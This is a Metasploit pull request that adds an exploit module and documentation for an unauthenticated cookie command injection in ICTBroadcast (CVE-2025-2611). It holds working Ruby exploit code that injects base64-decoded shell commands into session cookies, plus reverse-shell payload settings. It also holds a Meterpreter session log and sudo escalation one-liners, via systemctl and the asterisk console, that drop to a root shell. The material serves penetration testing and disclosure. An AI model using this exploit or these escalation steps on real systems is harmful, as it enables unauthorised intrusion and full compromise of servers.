### PR TITLE
Add ICTBroadcast Unauthenticated Remote Code Execution (CVE-2025-2611)

### DIFF
--- a/documentation/modules/exploit/linux/http/ictbroadcast_unauth_cookie.md
+++ b/documentation/modules/exploit/linux/http/ictbroadcast_unauth_cookie.md
@@ -105,7 +105,7 @@ exploit
 
 ## Scenarios
 
-### **Unauthenticated Command Execution**
+### Unauthenticated Command Execution
 **Note**: Ensure that the target is vulnerable using the `check` command before running the exploit.
 
 **Note**: The session cookie is retrieved dynamically and modified for command injection.

--- a/documentation/modules/exploit/linux/http/ictbroadcast_unauth_cookie.md
+++ b/documentation/modules/exploit/linux/http/ictbroadcast_unauth_cookie.md
@@ -154,3 +154,27 @@ User asterisk may run the following commands on f7681361bd20:
     (root) NOPASSWD: /bin/systemctl
 bash-4.4$ 
 ```
+#### Low-hanging LPE via systemctl
+
+If `/bin/systemctl` is listed in sudo as NOPASSWD, you can escalate to root (outside Docker) via:
+
+```bash
+sudo systemctl 
+!sh
+```
+
+*Source: [https://gtfobins.github.io/gtfobins/systemctl/#sudo](https://gtfobins.github.io/gtfobins/systemctl/#sudo)*
+
+#### Low-hanging LPE via Asterisk NOPASSWD
+
+If `/usr/sbin/asterisk` is listed in sudo as NOPASSWD, you can obtain a root shell by:
+
+```bash
+  # 1) Start Asterisk as root, in foreground so it creates its CLI socket
+sudo asterisk -F
+
+  # 2) Connect to the Asterisk console and drop into a root shell
+sudo asterisk -r
+f7681361bd20*CLI> !sh
+sh-4.4#
+```

--- a/documentation/modules/exploit/linux/http/ictbroadcast_unauth_cookie.md
+++ b/documentation/modules/exploit/linux/http/ictbroadcast_unauth_cookie.md
@@ -1,0 +1,156 @@
+## Vulnerable Application
+
+This Metasploit module exploits an **unauthenticated remote code
+execution (RCE)** vulnerability in **ICTBroadcast**.
+The vulnerability exists due to improper handling of session
+cookies in the authentication mechanism. An attacker can inject arbitrary system commands by modifying the session cookie.
+
+The issue affects **various versions of ICTBroadcast**, but
+specific impacted releases are currently unknown. The vulnerability allows an attacker to execute shell commands **without authentication**.
+
+## Options
+
+None
+
+## Testing
+
+To test the exploit, spin up a vulnerable ICTBroadcast instance with Docker.
+
+```yaml
+services:
+  db:
+    image: mariadb:10.6
+    container_name: ictmysql
+    restart: unless-stopped
+    environment:
+      MYSQL_ROOT_PASSWORD: root     
+      MARIADB_ROOT_HOST: '%'       
+      MYSQL_DATABASE: ictbroadcast
+      MYSQL_USER: ictuser
+      MYSQL_PASSWORD: ictpass
+    volumes:
+      - db_data:/var/lib/mysql
+    ports:
+      - "3306:3306"
+
+  ictbroadcast:
+    image: chocapikk/ictbroadcast-cve-2025-2611:latest
+    container_name: ictbroadcast
+    depends_on:
+      - db
+    ports:
+      - "80:80"
+      - "443:443"
+    command: >
+      bash -c "
+        composer --working-dir=/usr require stefangabos/zebra_pagination &&
+        /usr/sbin/httpd -k start &&
+        /usr/sbin/php-fpm &&
+        tail -f /dev/null
+      "
+
+volumes:
+  db_data:
+```
+
+1. Start the stack:
+
+```bash
+docker compose up -d
+```
+
+2. Verify that the login page is reachable at **`http://localhost/login.php`**.
+   The application should issue a valid session cookie on first visit.
+
+3. Run the Metasploit module.
+   The exploit will automatically harvest the session cookie (format may vary across deployments)
+   and leverage it to execute arbitrary commands via the vulnerable endpoint.
+
+## Verification Steps
+1. Start **Metasploit Framework**:
+```bash
+msfconsole
+```
+
+2. Load the module:
+```bash
+use exploit/linux/http/ictbroadcast_unauth_cookie
+```
+
+3. Set the **target IP address**:
+```bash
+set RHOSTS <TARGET_IP>
+```
+
+4. Set the **payload** for command execution:
+```bash
+set PAYLOAD cmd/unix/reverse_bash
+```
+
+5. Configure the listener:
+```bash
+set LHOST <YOUR_IP>
+set LPORT 4444
+```
+
+6. Check if the target is vulnerable:
+```bash
+check
+```
+
+7. Exploit the target:
+```bash
+exploit
+```
+
+## Scenarios
+
+### **Unauthenticated Command Execution**
+**Note**: Ensure that the target is vulnerable using the `check` command before running the exploit.
+
+**Note**: The session cookie is retrieved dynamically and modified for command injection.
+
+```bash
+msf6 exploit(linux/http/ictbroadcast_unauth_cookie) > run http://lab/
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if target is an ICTBroadcast instance…
+[+] ICTBroadcast detected, verifying injection…
+[*] Retrieving session cookies dynamically...
+[*] Found cookies: BROADCAST="16c4d0bf9d5b5cf9d8dc3f19e6ea2338;"
+[+] The target is vulnerable. Injection confirmed (slept 3s)
+[*] Sending stage (3090404 bytes) to 192.168.128.3
+[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 192.168.128.3:58784) at 2025-08-02 19:27:09 +0200
+
+meterpreter > sysinfo 
+Computer     : 192.168.128.3
+OS           : Red Hat 8.10 (Linux 6.15.8-2-cachyos)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > shell
+Process 798 created.
+Channel 1 created.
+export TERM=xterm
+SHELL=/bin/bash script -q /dev/null
+bash-4.4$ sudo -l
+sudo -l
+Matching Defaults entries for asterisk on f7681361bd20:
+    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
+    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
+    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
+    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
+    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
+    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
+    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
+
+User asterisk may run the following commands on f7681361bd20:
+    (root) NOPASSWD: /usr/sbin/asterisk
+    (root) NOPASSWD: /etc/init.d/asterisk
+    (root) NOPASSWD: /etc/init.d/httpd
+    (root) NOPASSWD: /etc/init.d/mysqld
+    (root) NOPASSWD: /etc/init.d/kannel
+    (root) NOPASSWD: /usr/sbin/ntpdate
+    (root) NOPASSWD: /usr/sbin/rabbitmqctl
+    (root) NOPASSWD: /bin/systemctl
+```

--- a/documentation/modules/exploit/linux/http/ictbroadcast_unauth_cookie.md
+++ b/documentation/modules/exploit/linux/http/ictbroadcast_unauth_cookie.md
@@ -111,16 +111,16 @@ exploit
 **Note**: The session cookie is retrieved dynamically and modified for command injection.
 
 ```bash
-msf6 exploit(linux/http/ictbroadcast_unauth_cookie) > run http://lab/
+msf6 exploit(linux/http/ictbroadcast_unauth_cookie) > run http://lab
 [*] Started reverse TCP handler on 192.168.1.36:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Checking if target is an ICTBroadcast instance…
-[+] ICTBroadcast detected, verifying injection…
-[*] Retrieving session cookies dynamically...
-[*] Found cookies: BROADCAST="16c4d0bf9d5b5cf9d8dc3f19e6ea2338;"
-[+] The target is vulnerable. Injection confirmed (slept 3s)
+[*] Checking ICTBroadcast via JS fingerprints
+[+] JS fingerprint found; performing timing tests
+[*] Retrieving session cookies dynamically
+[*] Found cookies: BROADCAST=49b067ae1fdfbcab3d73caa1c7e6d75a
+[+] The target is vulnerable. Injected RCE (slept 4s)
 [*] Sending stage (3090404 bytes) to 192.168.128.3
-[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 192.168.128.3:58784) at 2025-08-02 19:27:09 +0200
+[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 192.168.128.3:53178) at 2025-08-04 17:50:33 +0200
 
 meterpreter > sysinfo 
 Computer     : 192.168.128.3
@@ -129,9 +129,8 @@ Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
 meterpreter > shell
-Process 798 created.
+Process 877 created.
 Channel 1 created.
-export TERM=xterm
 SHELL=/bin/bash script -q /dev/null
 bash-4.4$ sudo -l
 sudo -l
@@ -153,4 +152,5 @@ User asterisk may run the following commands on f7681361bd20:
     (root) NOPASSWD: /usr/sbin/ntpdate
     (root) NOPASSWD: /usr/sbin/rabbitmqctl
     (root) NOPASSWD: /bin/systemctl
+bash-4.4$ 
 ```

--- a/modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb
+++ b/modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb
@@ -1,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ICTBroadcast Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits an unauthenticated remote code execution (RCE) vulnerability
+          in ICTBroadcast. The vulnerability exists in the way session cookies are handled
+          and processed, allowing an attacker to inject arbitrary system commands.
+        },
+        'Author' => [
+          'Valentin Lobstein' # Metasploit module, Vulnerability discovery
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://www.ictbroadcast.com/'],
+          ['CVE', '2025-2611']
+        ],
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix/Linux Command Shell',
+            {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2025-03-19',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def get_valid_cookies
+    return @valid_cookies if @valid_cookies
+
+    print_status('Retrieving session cookies dynamically...')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login.php')
+    )
+
+    return [] unless res&.get_cookies
+
+    cookies = res.get_cookies.split('; ').map do |c|
+      key, value = c.split('=', 2)
+      next unless key && value
+
+      Msf::Exploit::Remote::HTTP::HttpCookie.new(key.strip, value.strip)
+    end.compact
+
+    print_status("Found cookies: #{cookies.map(&:to_s).join(', ')}")
+    @valid_cookies = cookies
+  end
+
+  def inject_cookie_payload(command)
+    cookies = get_valid_cookies
+    return if cookies.empty?
+
+    encoded_command = Rex::Text.encode_base64(command)
+    payload = "echo${IFS}#{encoded_command}|base64${IFS}-d|sh"
+
+    updated_cookies = cookies.map do |cookie|
+      "#{cookie.name}=`#{payload}`"
+    end.join('; ')
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login.php'),
+      'headers' => { 'Cookie' => updated_cookies }
+    )
+  end
+
+  def check
+    print_status('Checking if target is an ICTBroadcast instance…')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    )
+    return Exploit::CheckCode::Unknown('No response from target.') unless res
+    return Exploit::CheckCode::Safe unless res.code == 200
+
+    html = res.get_html_document
+    title = html.at('title')&.text
+    keywords = html.at("meta[name='keywords']")&.[]('content')
+    description = html.at("meta[name='description']")&.[]('content')
+
+    if title&.include?('ICT Broadcast') ||
+       keywords&.include?('ict') ||
+       description&.include?('ICT Broadcast')
+
+      print_good('ICTBroadcast detected, verifying injection…')
+
+      [1, 2, 3, 4, 5].sample(3).each do |t|
+        start_time = Time.now
+        inject_cookie_payload("sleep #{t}")
+        if (Time.now - start_time) >= (t - 0.3)
+          return Exploit::CheckCode::Vulnerable("Injection confirmed (slept #{t}s)")
+        end
+      end
+
+      return Exploit::CheckCode::Appears('ICTBroadcast detected, but injection timing did not match.')
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    inject_cookie_payload(payload.encoded)
+  end
+end

--- a/modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb
+++ b/modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
           and processed, allowing an attacker to inject arbitrary system commands.
         },
         'Author' => [
-          'Valentin Lobstein' # Metasploit module author
+          'Valentin Lobstein' # Metasploit module author and vulnerability discovery
         ],
         'License' => MSF_LICENSE,
         'References' => [

--- a/modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb
+++ b/modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def inject_cookie_payload(command)
     cookies = get_valid_cookies
-    return if cookies.empty?
+    return if cookies.blank?
 
     encoded_command = Rex::Text.encode_base64(command)
     payload = "echo${IFS}#{encoded_command}|base64${IFS}-d|sh"

--- a/modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb
+++ b/modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     print_status('Checking if target is an ICTBroadcast instance…')
 
-    res = send_request_cgi(
+    res = send_request_cgi!(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path)
     )

--- a/modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb
+++ b/modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
           and processed, allowing an attacker to inject arbitrary system commands.
         },
         'Author' => [
-          'Valentin Lobstein' # Metasploit module, Vulnerability discovery
+          'Valentin Lobstein' # Metasploit module author
         ],
         'License' => MSF_LICENSE,
         'References' => [
@@ -51,81 +51,73 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_valid_cookies
-    return @valid_cookies if @valid_cookies
+    @get_valid_cookies ||= begin
+      print_status('Retrieving session cookies dynamically')
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'login.php')
+      )
+      fail_with(Failure::UnexpectedReply, 'No response from server') unless res
 
-    print_status('Retrieving session cookies dynamically...')
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'login.php')
-    )
+      if (cookies = res.get_cookies)
+        cookie_jar.clear
+        cookie_jar.parse_and_merge(
+          cookies,
+          "#{datastore['SSL'] ? 'https' : 'http'}://#{rhost}:#{rport}"
+        )
+        print_status("Found cookies: #{cookie_jar.cookies.map(&:to_s).join('; ')}")
+      end
 
-    res_cookies = res&.get_cookies
-    return [] unless res_cookies
-    cookies = res_cookies.split('; ').map do |c|
-      key, value = c.split('=', 2)
-      next unless key && value
-
-      Msf::Exploit::Remote::HTTP::HttpCookie.new(key.strip, value.strip)
-    end.compact
-
-    print_status("Found cookies: #{cookies.map(&:to_s).join(', ')}")
-    @valid_cookies = cookies
+      cookie_jar
+    end
   end
 
-  def inject_cookie_payload(command)
-    cookies = get_valid_cookies
-    return if cookies.blank?
+  def inject_command(command)
+    jar = get_valid_cookies
+    return if jar.empty?
 
-    encoded_command = Rex::Text.encode_base64(command)
-    payload = "echo${IFS}#{encoded_command}|base64${IFS}-d|sh"
+    jar.cookies.each do |c|
+      original = c.value
+      c.value = "`echo${IFS}#{Rex::Text.encode_base64(command)}|base64${IFS}-d|sh`"
 
-    updated_cookies = cookies.map do |cookie|
-      "#{cookie.name}=`#{payload}`"
-    end.join('; ')
+      send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'login.php'),
+        'cookie_jar' => jar
+      )
 
-    send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'login.php'),
-      'headers' => { 'Cookie' => updated_cookies }
-    )
+      c.value = original
+    end
   end
 
   def check
-    print_status('Checking if target is an ICTBroadcast instance…')
+    print_status('Checking ICTBroadcast via JS fingerprints')
 
-    res = send_request_cgi!(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path)
-    )
-    return Exploit::CheckCode::Unknown('No response from target.') unless res
-    return Exploit::CheckCode::Safe unless res.code == 200
-
-    html = res.get_html_document
-    title = html.at('title')&.text
-    keywords = html.at("meta[name='keywords']")&.[]('content')
-    description = html.at("meta[name='description']")&.[]('content')
-
-    if title&.include?('ICT Broadcast') ||
-       keywords&.include?('ict') ||
-       description&.include?('ICT Broadcast')
-
-      print_good('ICTBroadcast detected, verifying injection…')
-
-      [1, 2, 3, 4, 5].sample(3).each do |t|
-        start_time = Time.now
-        inject_cookie_payload("sleep #{t}")
-        if (Time.now - start_time) >= (t - 0.3)
-          return Exploit::CheckCode::Vulnerable("Injection confirmed (slept #{t}s)")
-        end
-      end
-
-      return Exploit::CheckCode::Appears('ICTBroadcast detected, but injection timing did not match.')
+    fingerprint_found = %w[
+      IVRDesigner.js agent.js campaign.js campaign_feedback.js
+      campaign_integration.js phone.js supervisor.js trunk.js
+    ].any? do |file|
+      uri = normalize_uri(target_uri.path, 'js', file)
+      res = send_request_cgi!('method' => 'GET', 'uri' => uri)
+      res&.code == 200 && res.body.include?('ICT Innovations')
     end
 
-    Exploit::CheckCode::Safe
+    return CheckCode::Safe unless fingerprint_found
+
+    print_good('JS fingerprint found; performing timing tests')
+
+    [3, 4, 5].sample(2).each do |t|
+      start = Time.now
+      inject_command("sleep #{t}")
+      if Time.now - start >= (t - 0.3)
+        return CheckCode::Vulnerable("Injected RCE (slept #{t}s)")
+      end
+    end
+
+    CheckCode::Appears('Fingerprint present but timing did not match')
   end
 
   def exploit
-    inject_cookie_payload(payload.encoded)
+    inject_command(payload.encoded)
   end
 end

--- a/modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb
+++ b/modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb
@@ -59,9 +59,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'login.php')
     )
 
-    return [] unless res&.get_cookies
-
-    cookies = res.get_cookies.split('; ').map do |c|
+    res_cookies = res&.get_cookies
+    return [] unless res_cookies
+    cookies = res_cookies.split('; ').map do |c|
       key, value = c.split('=', 2)
       next unless key && value
 


### PR DESCRIPTION
Hello Metasploit Team,

I'm submitting a module for an **unauthenticated remote code execution** vulnerability in **ICTBroadcast**.

The vulnerability is simple: `/login.php` issues a session cookie, and the server-side code **evaluates certain cookie keys using backticks**. This allows command injection directly inside the cookie, no authentication needed.

* Discovered: **2025-03-19**
* CVE: **pending via VulnCheck**, no assignment yet because the vendor never responded
* I've reached out multiple times the vendor, **no answer**
* As of today, **I have no idea whether it's been patched**

I'm not waiting anymore. Since the vendor didn't engage, I'm releasing the module so people can at least detect and mitigate the issue.

Let me know if anything needs to change.